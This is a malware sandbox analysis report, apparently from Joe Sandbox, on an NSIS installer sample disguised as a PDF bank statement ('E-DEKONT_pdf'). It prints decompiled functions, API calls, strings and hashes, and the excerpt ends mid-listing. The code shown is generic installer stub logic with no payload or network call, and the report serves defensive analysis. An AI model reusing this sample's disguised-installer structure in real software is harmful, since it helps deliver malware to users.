Part of subcall function 00405DC7: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 00405DED

GetFileSize.KERNEL32(00000000,00000000,007FF000,00000000,007F5000,007F5000,007FD000,007FD000,80000000,00000003,?,?,004036DA,?,?,00000007), ref: 00402F85
GlobalAlloc.KERNELBASE(00000040,00000007,?,?,004036DA,?,?,00000007,00000009,0000000B), ref: 004030BB

Strings

soft, xrefs: 00402FFA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 004030E2
Inst, xrefs: 00402FF1
Error launching installer, xrefs: 00402F5C
Null, xrefs: 00403003

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-1074636621
Opcode ID: ccfa8ece6b5d7c4bc2a75011a0cf13bb4d0b13ea53226f34efe571a73c4d02a0
Instruction ID: 2ea85dbe2d09deba88a00fa1acdf7f4cc296daf3ab3279517ce880d50f7f1faa
Opcode Fuzzy Hash: ccfa8ece6b5d7c4bc2a75011a0cf13bb4d0b13ea53226f34efe571a73c4d02a0
Instruction Fuzzy Hash: 1751A071A01208ABDB20AF64DD85B5E7FACEB04356F20813FF501B62D5C77D9E818A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405355 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405355(CHAR* _a4, char _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7c1f44;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x7c6014;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062C7(0, _t39, 0x7acd48, 0x7acd48, _a4);
					}
					_t26 = lstrlenA(0x7acd48);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x7c1f28, 0x7acd48); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7acd48;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x7acd48)) = 0;
							return _t28;
						}
					} else {
						_t6 =  &_a8; // 0x40327b
						_t26 =  &(_a4[lstrlenA( *_t6)]);
						if(_t26 < 0x4000) {
							_t8 =  &_a8; // 0x40327b
							_t26 = lstrcatA(0x7acd48,  *_t8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x0040535b
0x00405367
0x0040536a
0x00405370
0x0040537c
0x0040537f
0x00405382
0x00405388
0x00405388
0x0040538e
0x00405396
0x00405399
0x004053b6
0x004053ba
0x004053c3
0x004053c3
0x004053cd
0x004053d6
0x004053e2
0x004053e9
0x004053ed
0x004053f0
0x00405403
0x00405411
0x00405411
0x00405415
0x00405417
0x0040541a
0x00000000
0x0040541a
0x0040539b
0x0040539b
0x004053a3
0x004053ab
0x004053ad
0x004053b1
0x00000000
0x004053b1
0x004053ab
0x00405399
0x00405424

APIs

lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll,00000000,0079EE4E,767C23A0,?,?,?,?,?,?,?,?,?,0040327B,00000000,?), ref: 0040538E
lstrlenA.KERNEL32({2@,Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll,00000000,0079EE4E,767C23A0,?,?,?,?,?,?,?,?,?,0040327B,00000000), ref: 0040539E
lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll,00000020,{2@,Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll,00000000,0079EE4E,767C23A0), ref: 004053B1
SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll), ref: 004053C3
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E9
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405403
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405411

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll, xrefs: 00405375, 00405387, 0040538D, 004053B0, 004053BC
{2@, xrefs: 0040539B, 004053AD

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsvA708.tmp\System.dll${2@
API String ID: 2531174081-99014134
Opcode ID: fcac808d76aed6db0d37f44b4683b04ac6d9e07f0b6d68d9f287ec4d5548b40c
Instruction ID: 4681376622a190fc029a1f8c6300b99c7a2c44d7a72f4c8551b7a94c51a1d200
Opcode Fuzzy Hash: fcac808d76aed6db0d37f44b4683b04ac6d9e07f0b6d68d9f287ec4d5548b40c
Instruction Fuzzy Hash: B7218E71900118BBCB119FA5DD84EDEBFA9EF09354F10807AF944B6291C7784A908B98

Uniqueness

Uniqueness Score: -1.00%

Function 00403143 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00403143(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x79ed20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403348( *0x7c5fb8 + _t62);
				}
				if(E00403332( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E00403332(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E00403332(0x79ad20, _t97) == 0) {
								goto L41;
							}
							_t69 = E00405E6E(_a8, 0x79ad20, _t97); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x414478 =  *0x414478 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x414460 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E00403332(0x79ad20, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x414450 = 0x79ad20;
						 *0x414454 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x414458 = _t94;
							 *0x41445c = _v12;
							_t74 = E00406765(0x414450);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x414458; // 0x79ee4e
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7c6014 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E00405355(0,  &_v88);
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x414458; // 0x79ee4e
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E00405E6E(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x0040314b
0x0040314f
0x00403152
0x00403157
0x00403159
0x00403159
0x00403160
0x00403164
0x00403169
0x0040316b
0x0040316b
0x00403172
0x00403177
0x00403182
0x00403182
0x00403194
0x00403320
0x00403320
0x00000000
0x0040319a
0x0040319e
0x004032cd
0x00403310
0x00403312
0x00403312
0x0040331e
0x00403325
0x00403328
0x00000000
0x00000000
0x00000000
0x00000000
0x0040331e
0x004032d2
0x00000000
0x00000000
0x004032d4
0x004032d7
0x004032da
0x004032dd
0x004032df
0x004032df
0x004032ef
0x00000000
0x00000000
0x004032f6
0x004032fd
0x004032c7
0x004032c7
0x00403322
0x00403322
0x00000000
0x00403322
0x004032ff
0x00403302
0x00403309
0x00000000
0x00000000
0x00000000
0x0040330b
0x00000000
0x004032d7
0x004031aa
0x004031ac
0x004031b3
0x004031b3
0x004031ba
0x004031c0
0x004031c7
0x004031ca
0x00000000
0x00000000
0x00000000
0x00000000
0x004031d0
0x004031d0
0x004031d0
0x004031d8
0x004031da
0x004031da
0x004031eb
0x00000000
0x00000000
0x004031f1
0x004031f4
0x004031fa
0x00403200
0x00403200
0x0040320b
0x00403211
0x00403216
0x0040321d
0x00403220
0x00000000
0x00000000
0x00403226
0x0040322c
0x0040322e
0x00403237
0x00403239
0x00403267
0x0040326d
0x00403276
0x0040327b
0x0040327b
0x00403280
0x004032bb
0x00000000
0x00000000
0x00000000
0x00403282
0x00403286
0x0040329d
0x004032a2
0x004032a5
0x004032a8
0x004032ab
0x004032af
0x00000000
0x00000000
0x00000000
0x004032b5
0x0040328f
0x00403296
0x00000000
0x00000000
0x00403298
0x00000000
0x00403298
0x00403280
0x004032c3
0x00000000
0x004032c3
0x00000000
0x004031d0

APIs

GetTickCount.KERNEL32 ref: 004031AA
GetTickCount.KERNEL32 ref: 0040322E
MulDiv.KERNEL32(7FFFFFFF,00000064,00000007), ref: 00403257
wsprintfA.USER32 ref: 00403267

Strings

y, xrefs: 0040316B
... %d%%, xrefs: 00403261
Ny, xrefs: 0040320B, 00403226, 0040329D
y, xrefs: 00403200, 00403289, 004032F3, 0040328C

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: y$ y$... %d%%$Ny
API String ID: 551687249-4120447693
Opcode ID: 3f5a9690675092f22fb810837e33e53015671863e040307b19d291e7def74cfe
Instruction ID: 63e60ac67b4e883fe7bd24bdd2c574d132039877e9348bdd5c077dae5ce07507
Opcode Fuzzy Hash: 3f5a9690675092f22fb810837e33e53015671863e040307b19d291e7def74cfe
Instruction Fuzzy Hash: 9D515B71900209ABDF10CFA5D984B9F7BA8AF44756F14417AEC11B72C0DB389F51CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004065D2 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065D2(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004065e9
0x004065f2
0x004065f4
0x004065f4
0x004065f8
0x0040660a
0x00406604
0x00406604
0x00406604
0x0040660e
0x00406622
0x00406636
0x0040663d

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065E9
wsprintfA.USER32 ref: 00406622
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406636

Strings

UXTHEME, xrefs: 004065DB
\, xrefs: 004065FA
%s%s.dll, xrefs: 0040661C

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction ID: 76c47868d5e75c0d477681ee613e4a8fc51d539333552aabfef4ea70f2838048
Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction Fuzzy Hash: 98F0F63055020A6BEB149B68ED0DFEB365CAB08304F1404BEA586E20C1EAB9D9258B69

Uniqueness

Uniqueness Score: -1.00%

Function 6EC91F58 Relevance: 9.1, APIs: 6, Instructions: 134
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E6EC91F58(void* _a4) {
				signed int _v4;
				signed int _v8;
				signed int _t46;
				void* _t47;
				signed int _t48;
				void* _t49;
				void* _t52;
				void* _t56;
				signed int _t57;
				signed int _t59;
				void* _t60;

				_t52 = _a4;
				_t46 = 0 |  *((intOrPtr*)(_t52 + 0x814)) > 0x00000000;
				while(1) {
					_v8 = _t46;
					_t59 = _t46 << 5;
					_t60 =  *(_t59 + _t52 + 0x830);
					if(_t60 == 0 || _t60 == 0x1a) {
						goto L8;
					}
					if(_t60 != 0xffffffff) {
						_t51 = _t60 - 1;
						if(_t60 - 1 > 0x18) {
							 *(_t59 + _t52 + 0x830) = 0x1a;
							L11:
							_t56 = _t59 + _t52;
							if( *((intOrPtr*)(_t59 + _t52 + 0x81c)) >= 0) {
							}
							_t48 =  *(_t59 + _t52 + 0x818) & 0x000000ff;
							 *(_t59 + _t52 + 0x834) =  *(_t59 + _t52 + 0x834) & 0x00000000;
							_v4 = _t48;
							if(_t48 > 7) {
								L28:
								_t49 = GlobalFree(_t60); // executed
								_t57 = _v8;
								if(_t57 == 0) {
									return _t49;
								}
								_t55 =  !=  ? _t57 + 1 : 0;
								_t46 =  !=  ? _t57 + 1 : 0;
								continue;
							} else {
								switch( *((intOrPtr*)(_t48 * 4 +  &M6EC92108))) {
									case 0:
										 *(_t56 + 0x820) =  *(_t56 + 0x820) & 0x00000000;
										goto L28;
									case 1:
										_push(__esi);
										__eax = E6EC91326();
										_pop(__ecx);
										goto L18;
									case 2:
										_push(__esi);
										__eax = E6EC91326();
										_pop(__ecx);
										 *__ebp = __eax;
										_a4 = __edx;
										goto L28;
									case 3:
										__eax = E6EC912AF(__esi);
										goto L21;
									case 4:
										 *0x6ec95040 =  *0x6ec95040 +  *0x6ec95040;
										__eax = GlobalAlloc(0x40,  *0x6ec95040 +  *0x6ec95040);
										__ecx =  *0x6ec95040;
										_a4 = __eax;
										__eax = MultiByteToWideChar(0, 0, __esi,  *0x6ec95040, __eax,  *0x6ec95040);
										if(_v4 != 5) {
											__eax = _a4;
											L21:
											 *(__edi + __ebx + 0x834) = __eax;
											L18:
											 *__ebp = __eax;
											goto L28;
										}
										__eax = GlobalAlloc(0x40, 0x10);
										 *(__edi + __ebx + 0x834) = __eax;
										__edi = _a4;
										_push(__eax);
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
										goto L28;
									case 5:
										if( *__esi != 0) {
											_push(__esi);
											__eax = E6EC91326();
											 *(__edi + __ebx + 0x820) = __eax;
										}
										goto L28;
									case 6:
										 *(__edi + __ebx + 0x830) =  *(__edi + __ebx + 0x830) - 1;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x6ec95040;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x6ec95040 +  *0x6ec95038;
										_push(__ecx);
										__eax = __ecx + 0xc;
										 *(__edx + 0x820) = __eax;
										asm("cdq");
										_push(__edx);
										_push(__eax);
										__eax = E6EC9144D(__ecx);
										__esp = __esp + 0xc;
										goto L28;
								}
							}
						}
						_t47 = E6EC914E2(_t51);
						L9:
						L10:
						_t60 = _t47;
						goto L11;
					}
					_t47 = E6EC9152B();
					goto L10;
					L8:
					_t47 = E6EC912AF(0x6ec940c7);
					goto L9;
				}
			}

0x6ec91f5b
0x6ec91f6a
0x6ec91f6d
0x6ec91f6f
0x6ec91f73
0x6ec91f76
0x6ec91f7f
0x00000000
0x00000000
0x6ec91f89
0x6ec91f92
0x6ec91f98
0x6ec91fa2
0x6ec91fbc
0x6ec91fc4
0x6ec91fc7
0x6ec91fc7
0x6ec91fd7
0x6ec91fdf
0x6ec91fe7
0x6ec91fee
0x6ec920dc
0x6ec920dd
0x6ec920e3
0x6ec920e9
0x6ec92106
0x6ec92106
0x6ec920f6
0x6ec920f9
0x00000000
0x6ec91ff4
0x6ec91ff4
0x00000000
0x6ec91ffb
0x00000000
0x00000000
0x6ec92007
0x6ec92008
0x6ec9200d
0x00000000
0x00000000
0x6ec92016
0x6ec92017
0x6ec9201c
0x6ec9201d
0x6ec92020
0x00000000
0x00000000
0x6ec92029
0x00000000
0x00000000
0x6ec9203d
0x6ec92042
0x6ec92048
0x6ec92056
0x6ec9205a
0x6ec92065
0x6ec92090
0x6ec9202f
0x6ec9202f
0x6ec9200e
0x6ec9200e
0x00000000
0x6ec9200e
0x6ec9206b
0x6ec92071
0x6ec92078
0x6ec9207c
0x6ec9207d
0x6ec9207e
0x6ec92081
0x6ec92088
0x00000000
0x00000000
0x6ec92099
0x6ec9209b
0x6ec9209c
0x6ec920a9
0x6ec920a9
0x00000000
0x00000000
0x6ec920b9
0x6ec920ba
0x6ec920c1
0x6ec920c7
0x6ec920c8
0x6ec920cb
0x6ec920d1
0x6ec920d2
0x6ec920d3
0x6ec920d4
0x6ec920d9
0x00000000
0x00000000
0x6ec91ff4
0x6ec91fee
0x6ec91f9b
0x6ec91fb9
0x6ec91fba
0x6ec91fba
0x00000000
0x6ec91fba
0x6ec91f8b
0x00000000
0x6ec91faf
0x6ec91fb4
0x00000000
0x6ec91fb4

APIs

GlobalFree.KERNELBASE(00000000), ref: 6EC920DD

Part of subcall function 6EC912AF: lstrcpynA.KERNEL32(00000000,?,6EC91502,?,6EC911C4,-000000A0), ref: 6EC912BF

GlobalAlloc.KERNEL32(00000040,?), ref: 6EC92042
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6EC9205A
GlobalAlloc.KERNEL32(00000040,00000010), ref: 6EC9206B
CLSIDFromString.OLE32(00000000,00000000), ref: 6EC92081
GlobalFree.KERNEL32(00000000), ref: 6EC92088

Part of subcall function 6EC91958: VirtualAlloc.KERNEL32(00000000,00000010,00001000,00000040,?,6EC920A7,00000000,?), ref: 6EC9198A

Memory Dump Source

Source File: 00000000.00000002.3357909179.000000006EC91000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EC90000, based on PE: true

Associated: 00000000.00000002.3357866144.000000006EC90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3357973966.000000006EC94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3358014204.000000006EC96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec90000_E-DEKONT_pdf.jbxd

Similarity

API ID: Global$Alloc$Free$ByteCharFromMultiStringVirtualWidelstrcpyn
String ID:
API String ID: 506890080-0
Opcode ID: 9479ecb9a2bf7505d85f2c4f84c7829b59c78fa7dfa657e2de7459dde340aebf
Instruction ID: 6589e297e8d81e03e4e87ac6eac9a1ab4fd347f2c580fb0222e4b4a59b0d5c46
Opcode Fuzzy Hash: 9479ecb9a2bf7505d85f2c4f84c7829b59c78fa7dfa657e2de7459dde340aebf
Instruction Fuzzy Hash: 0C413171405605EFD304AFA9D885BAAB7FCFF42300F01962AE8A88B145FB305944DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0040581B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040581B(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_t5 =  &_v36; // 0x4037e5
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor = _t5;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405826
0x0040582a
0x0040582d
0x00405830
0x00405833
0x00405837
0x0040583b
0x00405843
0x0040584a
0x00405850
0x00405857
0x0040585e
0x00405866
0x00405868
0x00000000
